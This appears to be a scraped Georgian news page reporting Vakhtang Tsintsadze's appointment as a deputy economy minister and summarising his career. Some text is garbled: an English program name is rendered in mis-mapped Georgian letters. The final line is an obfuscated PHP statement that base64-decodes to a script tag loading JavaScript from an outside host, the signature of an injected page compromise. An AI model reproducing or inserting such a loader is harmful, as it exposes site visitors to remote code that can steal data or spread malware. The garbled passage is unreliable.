celsiusi
ავერსი შნაიდერი
საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილედ ვახტანგ ცინცაძე დაინიშნა, რომელიც ამ პოზიციაზე დანიშვნამდე, 2017 წლიდან სამინისტროს ეკონომიკური ანალიზისა და რეფორმების დეპარტამენტს ხელმძღვანელობდა.
ვახტან ცინცაძე ეკონომიკის სამინისტროს სისტემაში სხვადასხვა პოზიციებზე 2009 წლიდან მუშაობს. კერძოდ, ის 2009-2013 წწ. საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს ეკონომიკური ანალიზისა და პოლიტიკის დეპარტამენტის ეკონომიკური პოლიტიკის სამმართველოს მთავარ სპეციალისტად მუშაობდა; 2013 – 2016 წწ. დაიკავა საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს ეკონომიკური ანალიზისა და პოლიტიკის დეპარტამენტის ეკონომიკური პოლიტიკის სამმართველოს უფროსის თანამდებობა, ხოლო 2017 წლიდან არის საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს ეკონომიკური ზრდის ანალიზის დეპარტამენტის ხელმძღვანელი.
ვახტანგ ცინცაძეს აგრეთვე აქვს კერძო სექტორში საქმიანობის გამოცდილება. 2008-2009 წლებში ის ასევე მუშაობდა სს „თი ბი სი ბანკის“ გარე გაყიდვების ქსელის განვითარების უფროს მენეჯერად.
ვახტანგ ცინცაძეს გავლილი აქვს არაერთი საერთაშორისო კურსი თუ პროგრამა, მათ შორის: საერთაშორისო სავალუტო ფონდის, საქართველოს სტრატეგიისა და საერთაშორისო ურთიერთობათა კვლევის ფონდის, ესტონეთის დიპლომატიური სკოლის, პოლონეთის საგარეო საქმეთა სამინისტროსა და ევროკომისიის პროგრამები.
ვახტანგ ცინცაძე არის საქართველოს ტექნიკური უნივერსიტეტი ბიზნესის მართვის მაგისტრი. 2005-2006 წლებში იყო – ბერლინის ტექნიკური უნივერსიტეტის, 2012 წელს კი ჯორჯ მარშალის ცენტრის, აშშ-ს თავდაცვის სამინისტროს Lეადერს Pროგრამ ინ Aდვანცედ შეცურიტყ შტუდიეს (LPAშშ) პროგრამის მონაწილე. 2021 წლიდან არის საქართველოს ტექნიკური უნივერსიტეტი საჯარო მართვის დოქტორანტი.
ეკონომიკისა და მდგრადი განვითარების სამინისტროში მუშაობის პერიოდში ვახტანგ ცინცაძეს აქტიური მონაწილეობა აქვს მიღებული რამდენიმე მნიშვნელოვანი რეფორმის მომზადებაში. მათ შორისაა, საპენსიო რეფორმის (მეორე სვეტი) კონცეფციის შემუშავება და რეფორმის ეკონომიკური ეფექტების შეფასება/ანალიზი; საჯარო და კერძო თანამშრომლობის კონცეფციის და ჩარჩო კანონმდებლობის შემუშავება; გადახდისუუნარობის რეფორმის ფარგლებში ჩარჩო კანონმდებლობის შემუშავება; ფინანსებზე ხელმისაწვდომობის მექანიზმების განვითარება – საკრედიტო-საგარანტიო სქემის დიზაინის შემუშავება, იპოთეკური სესხების სუბსიდირების და საგარანტიო პროგრამების შემუშავებაში მონაწილეობა; ალტერნატიული დაფინანსების მექანიზმების განვითარება – ლიზინგის განვითარების კონცეფციის და ფაქტორინგის კანონმდებლობის შემუშავებაში მონაწილეობა; წიაღის სექტორის რეფორმის კონცეფციის შემუშავებაში მონაწილეობა.
ინფორმაციას საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტრო ავრცელებს.  
306
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");